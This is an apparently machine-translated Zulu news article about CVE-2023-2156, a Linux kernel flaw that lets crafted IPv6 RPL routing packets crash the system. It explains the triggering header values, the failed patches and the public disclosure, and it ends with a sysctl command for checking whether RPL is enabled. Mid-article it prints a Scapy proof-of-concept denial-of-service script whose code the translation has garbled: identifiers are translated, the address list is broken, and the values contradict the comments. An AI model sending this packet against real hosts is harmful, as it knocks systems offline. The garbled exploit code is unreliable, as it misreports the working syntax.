Ulwazi ludaluliwe mayelana nokuba sengozini okungalungiswanga (0-day) (CVE-2023-2156) ku-Linux kernel, evumela ukumisa uhlelo ngokuthumela amaphakethe e-IPv6 aklanywe ngokukhethekile (iphakethe-lokufa). Inkinga ibonakala kuphela lapho ukusekelwa kwephrothokholi ye-RPL (I-Routing Protocol for Low-Power and Lossy Networks) ivuliwe, evinjelwa ngokuzenzakalelayo ekusabalaliseni futhi isetshenziswa ikakhulukazi kumadivayisi ashumekiwe asebenza kumanethiwekhi angenawaya anokulahlekelwa kwephakethe eliphezulu.
Ukuba sengozini kubangelwa ukucutshungulwa okungalungile kwedatha yangaphandle kukhodi yokuhlaziya yephrothokholi ye-RPL, okuholela ekuhlulekeni kokugomela kanye ne-kernel ukuya esimweni sokwethuka. Lapho ubeka idatha etholwe ekuhlukaniseni unhlokweni wephakethe le-IPv6 RPL esakhiweni se-k_buff (Socket Buffer), uma inkambu ye-CmprI isethelwe ku-15, inkambu ye-Segleft iye ku-1, kanye ne-CmprE ukuya ku-0, i-48-byte vector enamakheli iyacindezelwa. kumabhayithi angu-528 futhi kubonakala isimo lapho inkumbulo eyabelwe isigcinalwazi inganele. Kulesi simo, umsebenzi othi skb_push, osetshenziselwa ukusunduza idatha esakhiweni, uhlola ukungafani phakathi kosayizi wedatha nesigcinalwazi, okukhiqiza isimo sokwethuka ukuvimbela ukubhala ngale komngcele webhafa.
Isibonelo sokuxhaphaza: # Sizosebenzisa i-Scpy ukuze senze iphakethe lisuka ku-scapy.all import * import socket # Sebenzisa i-IPv6 kusukela ku-LAN yakho DST_ADDR = sys.argv[1] SRC_ADDR = DST_ADDR # Sisebenzisa amasokhethi ukuthumela iphakethe sockfd = isokhethi.sokhethi(isokhethi.AF_INET6, isokhethi.SOCK_RAW, isokhethi.IPPROTO_RAW) # Dala iphakethe # Uhlobo = 3 yenza lokhu kube iphakethe le-RPL # Amakheli anamakheli ama-3, kodwa ngenxa yokuthi i-CmprI iyi-15, # i-octet ngayinye yamakheli amabili okuqala iphathwa njengekheli elicindezelweyo # Segleft = 1 ukuze kuqalise ukukhulisa # lastentry = 0xf0 ibeka i-CmprI ku-15 futhi i-CmprE iye ku-0 p = IPv6(src=SRC_ADDR, dst=DST_ADDR) / IPv6ExtHdrSegmentRouting(uhlobo=3, amakheli:= :", "a8::", "a7::"], segleft=6, lastentry=1xf0) # Thumela leli phakethe elibi sockfd.sendto(bytes(p), (DST_ADDR, 0))
Kuyaphawuleka ukuthi abathuthukisi be-kernel bazisiwe ngobungozi emuva ngoJanuwari 2022 futhi ezinyangeni eziyi-15 ezedlule bazamile ukulungisa inkinga izikhathi ezintathu, bakhipha ama-patches ngoSepthemba 2022, Okthoba 2022 kanye no-Ephreli 2023, kodwa isikhathi ngasinye lapho kulungiswa khona. akwanele futhi ukuba sengozini akukwazanga ukuphinda kukhiqizwe. Ekugcineni, iphrojekthi ye-ZDI, eyaxhumanisa umsebenzi wokulungisa ubungozi, yanquma ukukhipha ulwazi oluningiliziwe mayelana nokuba sengozini ngaphandle kokulinda ukulungiswa kokusebenza ukuthi kutholakale ku-kernel.
Ngakho, ukuba sengozini kusalokhu kungalungisiwe. Ikakhulukazi, isiqephu esifakwe ku-6.4-rc2 kernel asisebenzi. Abasebenzisi bayelulekwa ukuthi bahlole ukuthi i-RPL protocol ayisetshenziswa yini ezinhlelweni zabo, okungenziwa kusetshenziswa umyalo sysctl -a | grep -i rpl_seg_enabled
Source: opennet.ru